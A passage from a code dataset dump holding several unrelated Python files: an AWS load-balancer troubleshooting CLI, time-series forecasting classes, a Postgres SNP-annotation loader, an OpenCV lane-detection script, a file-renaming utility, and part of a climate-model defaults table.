duplicating this question 3 times and use 'when' to control which one to display. get_elbv2 call will also be duplicated as well.\n 'when': lambda answers: answers['elb_type'] == 'application'\n },\n {\n 'type': 'list',\n 'name': 'elb',\n 'message': 'Which NLB are you having issue with?',\n 'choices': api.retrieve_elbv2, #currently there is no better way to call parse_elbs.parse_albs, parse_elbs.parse_nlbs or parse_elbs.parse_gwlbs other than duplicating this question 3 times and use 'when' to control which one to display. get_elbv2 call will also be duplicated as well.\n 'when': lambda answers: answers['elb_type'] == 'network'\n },\n {\n 'type': 'list',\n 'name': 'elb',\n 'message': 'Which GWLB are you having issue with?',\n 'choices': api.retrieve_elbv2, #currently there is no better way to call parse_elbs.parse_albs, parse_elbs.parse_nlbs or parse_elbs.parse_gwlbs other than duplicating this question 3 times and use 'when' to control which one to display. 
The get_elbv2 call will also be duplicated.\n            'when': lambda answers: answers['elb_type'] == 'gateway'\n        },\n        {\n            'type': 'list',\n            'name': 'tg',\n            'message': 'Which TG/backend are you having issue with?',\n            'choices': api.retrieve_target_groups, #this is always invoked even when the question is not asked, causing problems when a CLB is selected\n            'when': lambda answers: answers['elb_type'] != 'classic'\n        }\n    ]\n\n    answers = prompt(questions)\n    targets_health,tg_target_count = getTargetHealth(answers)\n    healthy_host_count,unhealthy_host_count = parseTgHealth(answers,targets_health) #consider fetching from CW metrics instead, easier for AZ-specific data\n\n    print(\"\\n\")\n\n    renderer = output_renderer()\n    if answers['elb_type'] == 'classic':\n        renderer.output_v1(targets_health,healthy_host_count,unhealthy_host_count)\n    else:\n        renderer.output_v2(answers,targets_health,healthy_host_count,unhealthy_host_count,tg_target_count)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"aws/elb-doctor","sub_path":"elb_doctor/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"43271410822","text":"from abc import abstractmethod, ABC\nfrom typing import List, Optional, Dict, Union\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\nfrom general_analytics_framwork.base_processes import AbstractComponent\nfrom general_analytics_framwork.datasets import TimeseriesBacktestDataset\n\n\nclass TimeSeriesModel(AbstractComponent):\n\n    def run(self, data):\n        for backtest_dataset in data:\n            for window in backtest_dataset:\n                self.fit_predict(window)\n        return data\n\n    def fit_predict(self, data: TimeseriesBacktestDataset):\n        self.fit(data.get_data(\"y\", \"train\"), data.get_data(\"regressors\", \"train\"))\n        prediction = self.predict(data.window.test_window_length)\n        data.add_prediction(self, prediction)\n        return data\n\n    @abstractmethod\n    def get_reference(self) -> str:\n        \"\"\"\n        Get a reference string for the model.\n\n        Returns:\n            str: The reference string.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def fit(\n        self,\n        y_train: List[float],\n        regressors_train: Optional[Dict[str, List[Union[float, int]]]]\n    ) -> None:\n        \"\"\"\n        Fit the model to the training data.\n\n        Parameters:\n            y_train (List[float]): The target values for training.\n            regressors_train (Optional[Dict[str, List[Union[float, int]]]]):\n                The regressor data.\n        \"\"\"\n        raise NotImplementedError\n\n    @abstractmethod\n    def predict(self, horizon: int) -> List[float]:\n        \"\"\"\n        Make predictions for the given horizon.\n\n        Parameters:\n            horizon (int): The number of time steps to predict.\n\n        Returns:\n            List[float]: The predicted values.\n        \"\"\"\n        raise NotImplementedError\n\n\nclass RandomWalk(TimeSeriesModel):\n    \"\"\"\n    RandomWalk class representing the Random Walk model.\n\n    Attributes:\n        last_observation_seen (Optional[float]): The last observation seen.\n\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"\n        Initialize the Random Walk model.\n        \"\"\"\n        self.last_observation_seen: Optional[float] = None\n        self._accepts_regressors: bool = False\n\n    def fit(\n        self,\n        y_train: List[float],\n        regressors_train: Optional[Dict[str, List[Union[float, int]]]] = None\n    ) -> None:\n        \"\"\"\n        Fit the Random Walk model.\n\n        Parameters:\n            y_train (List[float]): The target values for training.\n            regressors_train (Optional[Dict[str, List[Union[float, int]]]]):\n                The regressor data.\n        
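Example (a minimal doctest-style sketch with hypothetical values):\n\n        >>> model = RandomWalk()\n        >>> model.fit([1.0, 2.0, 3.0])\n        >>> model.predict(2)\n        [3.0, 3.0]\n        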
\"\"\"\n self.last_observation_seen = y_train[-1]\n\n def predict(self, horizon: int) -> List[float]:\n \"\"\"\n Make predictions using the Random Walk model.\n\n Parameters:\n horizon (int): The number of time steps to predict.\n\n Returns:\n List[float]: The predicted values.\n \"\"\"\n return [self.last_observation_seen for _ in range(horizon)]\n\n def get_reference(self) -> str:\n \"\"\"\n Get a reference string for the Random Walk model.\n\n Returns:\n str: The reference string.\n \"\"\"\n return \"RandomWalk\"\n\n\nclass ARIMA(TimeSeriesModel):\n \"\"\"\n ARIMA class representing the AutoRegressive Integrated Moving Average model.\n\n Parameters:\n auto_regressive (int, optional): The number of auto-regressive terms.\n integrated (int, optional): The order of differencing.\n moving_average (int, optional): The number of moving average terms.\n trend_type (str, optional): Type of trend component.\n\n Attributes:\n order (tuple): Order of ARIMA model.\n trend_type (str): Type of trend component.\n model (SARIMAX): The SARIMAX model instance.\n\n \"\"\"\n\n def __init__(\n self,\n auto_regressive: int = 1,\n integrated: int = 0,\n moving_average: int = 0,\n trend_type: Optional[str] = None):\n\n \"\"\"\n Initialize the ARIMA model.\n\n Parameters:\n auto_regressive (int, optional): The number of auto-regressive terms.\n integrated (int, optional): The order of differencing.\n moving_average (int, optional): The number of moving average terms.\n trend_type (str, optional): Type of trend component.\n \"\"\"\n self.order = (auto_regressive, integrated, moving_average)\n self.trend_type = trend_type\n self.model: Optional[SARIMAX] = None\n self._accepts_regressors: bool = False\n\n def fit(\n self,\n y_train: List[float],\n regressors_train: Optional[Dict[str, List[Union[float, int]]]] = None\n ) -> None:\n \"\"\"\n Fit the ARIMA model.\n\n Parameters:\n y_train (List[float]): The target values.\n regressors_train (Dict[str, List[Union[float, int]]], optional):\n The regressor data.\n\n Returns:\n None\n \"\"\"\n self.model = SARIMAX(\n endog=y_train,\n order=self.order,\n trend=self.trend_type,\n enforce_invertibility=False,\n enforce_stationarity=False\n ).fit(disp=0)\n\n def predict(self, horizon: int) -> List[float]:\n \"\"\"\n Make predictions using the ARIMA model.\n\n Parameters:\n horizon (int): The number of time steps to predict.\n\n Returns:\n List[float]: The predicted values.\n \"\"\"\n return self.model.forecast(horizon)\n\n def get_reference(self) -> str:\n \"\"\"\n Get a reference string for the ARIMA model.\n\n Returns:\n str: The reference string.\n \"\"\"\n reference = f\"ARIMA (AR: {self.order[0]}, \" \\\n f\"I: {self.order[1]}, \" \\\n f\"MA: {self.order[2]})\"\n return reference\n\n","repo_name":"tjwilks/general-analytics-framework","sub_path":"general_analytics_framwork/modelling.py","file_name":"modelling.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34383276846","text":"#! 
/usr/bin/env python\n\nimport os\nimport sys\n\nimport argparse\nimport psycopg2\nimport select\nimport re\nimport time\n\n\n# check if illegal chars are present in string\n# if yes, exit\n# legal chars = a-z, A-Z, dot, underscore, 0-9\n# param: string to sanitize\n# param: string descriptor, eg tablename\ndef sanitize( s, d='' ):\n    mo = re.search( r'([^a-zA-Z0-9._])', s )\n    if mo:\n        illegal_char = mo.group(1)\n        sys.stderr.write( \"illegal character %s in %s %s\\n\" % ( illegal_char, d, s ) )\n        sys.exit()\n\n\n# get db credentials from tab-separated file\n# there should only be one set of credentials\n# param: string, filepath\n# return: tuple of username, password, db_port, host\ndef get_creds( creds_file ):\n    fh = open( creds_file )\n    for line in fh:\n        line = line.rstrip( '\\n' )\n        line = line.lstrip()\n        if not line: continue\n        if line.startswith( '#' ): continue\n\n        username, password, port, host = line.split( '\\t' )\n        return ( username, password, port, host )\n\n\n# connect to postgres db\n# param: string, db name\n# param: string, path to tab-separated db credentials file\n# return: db connection object, db cursor object\ndef postgres_connect( db, creds_file ):\n    user, pwd, port, host = get_creds( creds_file )\n    dsn = 'host=%s port=%s dbname=%s user=%s password=%s' % ( host, port, db, user, pwd )\n    conn = psycopg2.connect( dsn )\n    curs = conn.cursor()\n\n    return( conn, curs )\n\n\n\n# process each line of annotation file\n# param: string representing line of file\n# param: argparse object\n# return: list of snp name and annotation value, or None for blank/header lines\ndef process_line( line, args ):\n    line = line.strip()\n    if not line: return None\n\n    if args.header_starter:\n        if line.startswith( args.header_starter ): return None\n\n    fields = line.split( args.delim )\n\n    snp_name = fields[args.snp_name_column]\n\n    if args.db_column_datatype.lower() == 'boolean':\n        if not args.present_snp_value:\n            sys.stderr.write( \"specify --present_snp_value\\n\" )\n            sys.exit()\n        else:\n            value = args.present_snp_value\n    else:\n        # if value is missing, substitute default_value\n        if len( fields ) < ( args.value_column + 1 ):\n            value = args.default_value\n        else:\n            value = fields[args.value_column]\n\n    return [ snp_name, value ]\n\n\n# for summary table, get range of values in annotation\n# param: argparse object\n# return: string representing range\ndef get_range( args ):\n    if args.db_column_datatype == 'boolean':\n        f_range = 'True, False'\n    elif args.db_column_datatype == 'varchar':\n        f_range = 'NA'\n    elif args.db_column_datatype == 'float' or args.db_column_datatype == 'integer':\n\n        sql = 'SELECT MAX( %s ), MIN( %s ) FROM %s' % ( args.db_column_name,\n                                                        args.db_column_name,\n                                                        args.table )\n        curs.execute( sql )\n        col_max, col_min = curs.fetchone()\n        f_range = '%s, %s' % ( col_min, col_max )\n    else:\n        msg = \"Can't determine feature range for datatype %s\\n\" % ( args.db_column_datatype )\n        raise ValueError( msg )\n\n\n    return f_range\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser( description='''Add to or update snp annotations in a db table.''' )\n\n    parser.add_argument( '--create_column', action='store_true', \n                         help='drop, create column; DELETES EXISTING DATA IN COLUMN' )\n    parser.add_argument( '--create_index', action='store_true', help='add index on annotation column' )\n    parser.add_argument( '--creds_file', \n                         help='''file with db credentials; tab-separated user, password, port, and host\n                         default: /home/cconnoll/chuckworking/annotation_db/gecco_db_creds''',\n                         
default='/home/cconnoll/chuckworking/annotation_db/gecco_db_creds' )\n parser.add_argument( '--default_value', default=None, help='default: None; used for missing values' )\n parser.add_argument( '--delim', default='\\t', help='field delimiter, defaults to tab' )\n parser.add_argument( '--db', help=\"name of db; defaults to 'functional_annotation'\",\n default='functional_annotation' )\n parser.add_argument( '--db_column_name', required=True, help='name of feature' )\n parser.add_argument( '--db_column_datatype', required=True,\n help='valid SQL datatype, needed if creating column here' )\n parser.add_argument( '--header_starter', help='start of header line if present' )\n parser.add_argument( '-p', '--present_snp_value', help='value to insert if snp is present in list' ) \n parser.add_argument( '--snp_files', nargs='*',\n help='file with snp names and optionally value' )\n parser.add_argument( '--snp_name_column', type=int, default=1,\n help='column in snp_file with snp_name; defaults to 1')\n parser.add_argument( '--summary_table', \n help='table with summary stats; default:variant_annotation_feature_summary',\n default='variant_annotation_feature_summary' )\n parser.add_argument( '--table', help=\"name of db table; defaults to 'variant_annotation'\",\n default='variant_annotation' )\n parser.add_argument( '--update_column', action='store_true', \n help=\"update column, requires that column exists already\" )\n parser.add_argument( '--value_column', type=int, default=2,\n help='column in snp_file with value; defaults to 2' )\n \n args = parser.parse_args()\n\n for arg in [ args.db, args.db_column_name, args.db_column_datatype, args.table ]:\n sanitize( arg )\n\n\n args.snp_name_column -= 1\n args.value_column -= 1\n return args\n\n\n\n################################################################################\n################################################################################\n##\n## main\n##\n################################################################################\n################################################################################\n\n# in some fashion, obtain list of snps to be added and associated feature value\n# put these snps into a dict where snp_name is key, feature value is value\n# loop over the summary files, appending the appropriate\n# feature value for each snp\n# need to append a header field as well\n# a two column input (file or STDIN) is a key-value pair\n# a one column input requires a feature value to be \n# appended for the snps in the list, and a value for\n# absent snps\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n conn, curs = postgres_connect( args.db, args.creds_file )\n\n if args.create_column:\n drop_column_sql = '''ALTER TABLE {0} DROP COLUMN IF EXISTS {1}'''.format( args.table, args.db_column_name )\n curs.execute( drop_column_sql )\n conn.commit()\n\n add_column_sql = '''ALTER TABLE {0} ADD COLUMN {1} {2}'''.format( args.table, \n args.db_column_name, \n args.db_column_datatype )\n curs.execute( add_column_sql )\n conn.commit()\n elif args.update_column:\n sql = \"\"\"SELECT column_name\n FROM information_schema.columns \n WHERE table_name='{0}' and column_name='{1}'\"\"\".format( args.table, args.db_column_name )\n curs.execute( sql )\n row = curs.fetchone()\n if not row:\n sys.stderr.write( \"column %s does not exist in table %s\\n\" % ( args.db_column_name, \n args.table ) )\n sys.exit()\n else:\n sys.stderr.write( \"please specify '--update_column' or '--create_column'\\n\" )\n sys.exit()\n\n 
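# Parameterized UPDATE: psycopg2 binds the value and variant name via %s;\n    # the table and column identifiers were already sanitized in parse_args().\n    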
update_sql = 'UPDATE {0} SET {1} = %s WHERE variant_name = %s'.format( args.table, \n                                                                           args.db_column_name )\n\n    # read snps from stdin\n    while sys.stdin in select.select([sys.stdin,],[],[],0.0)[0]:\n        line = sys.stdin.readline()\n        if line.startswith( '#' ): continue\n        if line:\n            result = process_line( line, args )\n            # process_line returns None for blank and header lines\n            if result:\n                snp_name, value = result\n                curs.execute( update_sql, [ value, snp_name ] )\n\n    # read snps from files\n    values = []\n    for filename in args.snp_files:\n\n        # might be nice to fork and sbatch here, committing at the end;\n        # would need to set up intermachine communication. db? ipc over tcp/ip?\n        # works ok as is; if resources become strained, consider implementing\n\n        sys.stderr.write( 'processing %s\\n' % ( os.path.basename( filename ) ) )\n        sys.stderr.flush()\n        fh = open( filename )\n        for line in fh:\n            if args.header_starter:\n                if line.startswith( args.header_starter ): continue\n            result = process_line( line, args )\n            if not result: continue\n            snp_name, value = result\n            curs.execute( update_sql, [ value, snp_name ] )\n            values.append( value )\n        fh.close()\n        sys.stderr.write( \"committing\\n\" )\n        conn.commit()\n\n    if args.create_index:\n        sys.stderr.write( \"creating index\\n\" )\n        index_sql = 'create index on {0} ( {1} )'.format( args.table, args.db_column_name )\n        curs.execute( index_sql )\n        conn.commit()\n\n    # add to summary; the upsert assumes feature_name is the summary table's unique key\n    summary_sql = '''INSERT INTO {0} (feature_name, feature_datatype, feature_count, feature_range )\n                     VALUES ( %s, %s, %s, %s )\n                     ON CONFLICT (feature_name) DO UPDATE\n                     SET feature_datatype = EXCLUDED.feature_datatype,\n                         feature_count = EXCLUDED.feature_count,\n                         feature_range = EXCLUDED.feature_range'''.format( args.summary_table )\n\n    if 'char' in args.db_column_datatype:\n        args.db_column_datatype = 'string'\n\n    f_count = len( values )\n    f_range = get_range( args )\n\n    curs.execute( summary_sql, [ args.db_column_name, args.db_column_datatype, f_count, f_range ] )\n    conn.commit()\n    \n","repo_name":"charlesconnolly/tools","sub_path":"add_annotation.py","file_name":"add_annotation.py","file_ext":"py","file_size_in_byte":10213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37095036321","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\nimport math\nfrom matplotlib import pyplot as plt\nimport time\n\ncap = cv2.VideoCapture(\"video1.mp4\")\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\nlower = 0\nupper = 1\n\nwhite_1_hsv = np.array([0, 0, 78], dtype=np.uint8)\nwhite1 = np.array([200, 200, 200], dtype=np.uint8)\nwhite_2_hsv = np.array([0, 0, 100], dtype=np.uint8)\nwhite2 = np.array([255, 255, 255], dtype=np.uint8)\n\nwhile True:\n    # Capture frame-by-frame\n    ret, frame = cap.read()\n    mask_white = cv2.inRange(frame, white1, white2)\n\n    if not ret:\n        print(\"Return code FALSE - problem capturing the frame\")\n\n    blur = cv2.GaussianBlur(mask_white, (5,5),0)\n\n    edges = cv2.Canny(blur,50,150)\n\n    lines = cv2.HoughLines(edges,1,np.pi/180, 150)\n\n    lista_m = []\n    lista_h = []\n\n    linhas_d_m = []\n    linhas_d_x1 = []\n    linhas_d_x2 = []\n    linhas_d_y1 = []\n    linhas_d_y2 = []\n    linhas_d_h = []\n\n    linhas_e_m = []\n    linhas_e_x1 = []\n    linhas_e_x2 = []\n    linhas_e_y1 = []\n    linhas_e_y2 = []\n    linhas_e_h = []\n\n    xis = []\n    yis = []\n\n    for x in range(0, len(lines)):\n        for rho, theta in lines[x]:\n            a = np.cos(theta)\n            b = np.sin(theta)\n            x0 = a*rho\n            y0 = b*rho\n            x1 = int(x0 + 1000*(-b))\n            y1 = int(y0 + 1000*(a))\n            x2 = int(x0 - 1000*(-b))\n            y2 = int(y0 - 1000*(a))\n            m = (y2 - y1)/(x2 - x1)\n\n            h = y1 - m*x1\n\n            
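# collect the slope (m) and intercept (h) of every detected line\n            lista_h.append(h)\n            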
lista_m.append(m)\n\n            # right-hand lines\n            if m>0.3 and m<2:\n                linhas_d_m.append(m)\n                linhas_d_x1.append(x1)\n                linhas_d_x2.append(x2)\n                linhas_d_y1.append(y1)\n                linhas_d_y2.append(y2)\n                linhas_d_h.append(h)\n\n\n            # left-hand lines\n            elif m<-0.2 and m>-2:\n                linhas_e_m.append(m)\n                linhas_e_x1.append(x1)\n                linhas_e_x2.append(x2)\n                linhas_e_y1.append(y1)\n                linhas_e_y2.append(y2)\n                linhas_e_h.append(h)\n\n            else:\n                lista_m.remove(m)\n                lista_h.remove(h)\n\n\n\n\n    if len(lista_m) > 1 and lista_m[0] != lista_m[1]:\n        x_i = (lista_h[1] - lista_h[0])/(lista_m[0] - lista_m[1])\n        y_i = lista_m[0] * x_i + lista_h[0]\n        x_i = int(x_i)\n        y_i = int(y_i)\n        xis.append(x_i)\n        yis.append(y_i)\n\n\n    x1 = 0\n    x2 = 0\n    x3 = 0\n    x4 = 0\n    y1 = 0\n    y2 = 0\n    y3 = 0\n    y4 = 0\n\n    # right line\n    if len(linhas_d_m)>1:\n        x1 = int(np.mean(linhas_d_x1))\n        x2 = int(np.mean(linhas_d_x2))\n        y1 = int(np.mean(linhas_d_y1))\n        y2 = int(np.mean(linhas_d_y2))\n        cv2.line(frame,(x1,y1), (x2,y2), (50,0,255),2)\n\n    # left line\n    if len(linhas_e_m)>1:\n        x3 = int(np.mean(linhas_e_x1))\n        x4 = int(np.mean(linhas_e_x2))\n        y3 = int(np.mean(linhas_e_y1))\n        y4 = int(np.mean(linhas_e_y2))\n        cv2.line(frame,(x3,y3), (x4,y4), (50,0,255),2)\n\n    # intersection point\n    if x1!=0 and x2!=0 and x3!=0 and x4!=0:\n        px = int(((x1*y2 - y1*x2)*(x3-x4) - (x1-x2)*(x3*y4 - y3*x4))/((x1-x2)*(y3-y4) - (y1-y2)*(x3-x4)))\n        py = int(((x1*y2 - y1*x2)*(y3-y4) - (y1-y2)*(x3*y4-x4*y3))/((x1-x2)*(y3-y4)-(y1-y2)*(x3-x4)))\n        cv2.circle(frame, (px, py), 1, (0,255,0), 5)\n\n    cv2.imshow(\"Video\", frame)\n\n    # check position 0, store it in a variable, access the variable\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n\n\n\n","repo_name":"Bilbia/robot_at3","sub_path":"Bilbia_Rascunho.py","file_name":"Bilbia_Rascunho.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27335834682","text":"import os\nimport sys\n\n\ndef rename(directory):\n    for filename in os.listdir(directory):\n        newpath = directory + '/' + filename.lower()\n        os.rename(directory + '/' + filename, newpath)\n        if os.path.isdir(newpath):\n            rename(newpath)\n\n\nif __name__ == \"__main__\":\n    rename(sys.argv[1])\n","repo_name":"pawel-wlk/python-course","sub_path":"l2/tolower.py","file_name":"tolower.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38657399177","text":"from sympl import (DataArray, add_direction_names,\n                   ensure_no_shared_keys)\nimport numpy as np\nimport copy\nfrom datetime import datetime\nfrom scipy.interpolate import CubicSpline\n\n\ndef init_mid_level_pressures(array_dims, quantity_description, initial_state):\n    # We assume the vertical level is the last dimension\n    vert_levels = array_dims[-1]\n\n    p_surf = quantity_description['surface_air_pressure']['default_value']\n    spacing = np.linspace(0.998, 0.001, vert_levels)\n    single_column = p_surf*spacing\n    single_column = single_column[np.newaxis, np.newaxis, :]\n\n    return single_column*np.ones(array_dims, order='F')\n\n\ndef init_interface_level_pressures(array_dims, quantity_description, initial_state):\n\n    vert_levels = array_dims[-1]\n    p_surf = quantity_description['surface_air_pressure']['default_value']\n    spacing = np.linspace(0.998, 0.001, vert_levels-1)\n    midlevel = p_surf*spacing\n\n    interface = np.zeros(vert_levels)\n    interface[1:-1] = 0.5*(midlevel[:-1] + midlevel[1:])\n    interface[0] = p_surf\n    interface[-1] = 0.0005*p_surf\n\n    
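# broadcast the single-column interface profile across the horizontal grid\n    return 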
interface*np.ones(array_dims, order='F')\n\n\ndef init_interface_level_sigma(array_dims, quantity_description, initial_state):\n\n vert_levels = array_dims[-1]\n spacing = np.linspace(0.998, 0.001, vert_levels-1)\n midlevel = spacing\n\n interface = np.zeros(vert_levels)\n interface[1:-1] = 0.5*(midlevel[:-1] + midlevel[1:])\n interface[0] = 1.\n interface[-1] = 0.0005\n\n return interface*np.ones(array_dims, order='F')\n\n\ndef init_mid_level_sigma(array_dims, quantity_description, initial_state):\n\n vert_levels = array_dims[-1]\n spacing = np.linspace(0.998, 0.001, vert_levels)\n midlevel = spacing\n\n return midlevel*np.ones(array_dims, order='F')\n\n\ndef init_interface_level_tau_longwave(array_dims, quantity_description, initial_state):\n\n vert_levels = array_dims[-1]\n spacing = np.linspace(0.998, 0.001, vert_levels-1)\n midlevel = spacing\n\n interface = np.zeros(vert_levels)\n interface[1:-1] = 0.5*(midlevel[:-1] + midlevel[1:])\n interface[0] = 1.\n interface[-1] = 0.0005\n tau_longwave = 1.*(1 - interface)\n\n return tau_longwave*np.ones(array_dims, order='F')\n\n\ndef init_ozone(array_dims, quantity_description, initial_state):\n\n import pkg_resources\n\n init_array = np.ones(array_dims, order='F')\n current_levels = np.linspace(0.998, 0.001, 30)[::-1]\n\n target_levels = np.linspace(0.998, 0.001, array_dims[-1])[::-1]\n\n file_name = 'ozone_profile.npy'\n file_path = 'climt._data'\n\n resource_path = pkg_resources.resource_filename(file_path, file_name)\n\n profile = np.load(resource_path)\n\n target_profile = CubicSpline(current_levels, profile[::-1])(target_levels)[::-1]\n\n if array_dims[-1] == 30:\n target_profile = profile\n\n # Ensure ozone concentration at top of model is not excessive\n # This is more in line with observations.\n target_profile[-1] /= 10\n\n init_array[:] = target_profile[np.newaxis, np.newaxis, :]\n\n return init_array\n\n\nclimt_quantity_descriptions = {\n 'latitude': {\n 'dims': ['x', 'y'],\n 'units': 'degrees_north',\n 'default_value': 0\n },\n 'longitude': {\n 'dims': ['x', 'y'],\n 'units': 'degrees_east',\n 'default_value': 0\n },\n 'air_pressure': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'Pa',\n 'init_func': init_mid_level_pressures\n },\n 'air_pressure_on_interface_levels': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'Pa',\n 'init_func': init_interface_level_pressures\n },\n 'sigma_levels': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'init_func': init_mid_level_sigma\n },\n 'sigma_on_interface_levels': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'dimensionless',\n 'init_func': init_interface_level_sigma\n },\n 'longwave_optical_depth_on_interface_levels': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'dimensionless',\n 'init_func': init_interface_level_tau_longwave\n },\n 'surface_air_pressure': {\n 'dims': ['x', 'y'],\n 'units': 'Pa',\n 'default_value': 1.0132e5\n },\n 'air_temperature': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'degK',\n 'default_value': 290.\n },\n 'air_temperature_on_interface_levels': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'degK',\n 'default_value': 290.\n },\n 'surface_temperature': {\n 'dims': ['x', 'y'],\n 'units': 'degK',\n 'default_value': 300.\n },\n 'sea_surface_temperature': {\n 'dims': ['x', 'y'],\n 'units': 'degK',\n 'default_value': 300.\n },\n 'soil_surface_temperature': {\n 'dims': ['x', 'y'],\n 'units': 'degK',\n 'default_value': 300.\n },\n 'northward_wind': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'm s^-1',\n 
'default_value': 0.\n },\n 'eastward_wind': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'divergence_of_wind': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 's^-1',\n 'default_value': 0.\n },\n 'atmosphere_relative_vorticity': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 's^-1',\n 'default_value': 0.\n },\n 'surface_geopotential': {\n 'dims': ['x', 'y'],\n 'units': 'm^2 s^-2',\n 'default_value': 0.\n },\n 'surface_longwave_emissivity': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 1.\n },\n 'specific_humidity': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'g/g',\n 'default_value': 0.\n },\n 'surface_specific_humidity': {\n 'dims': ['x', 'y'],\n 'units': 'g/g',\n 'default_value': 0.\n },\n 'mole_fraction_of_ozone_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'init_func': init_ozone\n },\n 'mole_fraction_of_carbon_dioxide_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 330e-6\n },\n 'mole_fraction_of_methane_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_nitrous_oxide_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_oxygen_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.21\n },\n 'mole_fraction_of_nitrogen_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.78\n },\n 'mole_fraction_of_hydrogen_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 500e-9\n },\n 'mole_fraction_of_cfc11_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_cfc12_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_cfc22_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'mole_fraction_of_carbon_tetrachloride_in_air': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'mole/mole',\n 'default_value': 0.\n },\n 'cloud_area_fraction_in_atmosphere_layer': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'shortwave_optical_thickness_due_to_aerosol': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'longwave_optical_thickness_due_to_aerosol': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'mass_content_of_cloud_ice_in_atmosphere_layer': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'mass_content_of_cloud_liquid_water_in_atmosphere_layer': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'cloud_ice_particle_size': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'micrometer',\n 'default_value': 20.\n },\n 'cloud_water_droplet_radius': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'micrometer',\n 'default_value': 10.\n },\n 'longwave_optical_thickness_due_to_cloud': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'shortwave_optical_thickness_due_to_cloud': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'dimensionless',\n 'default_value': 0.\n },\n 'longwave_heating_rate': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 
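# Entries with the _assuming_clear_sky suffix mirror the all-sky heating rates\n    # and fluxes; differencing the two yields the cloud contribution.\n    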
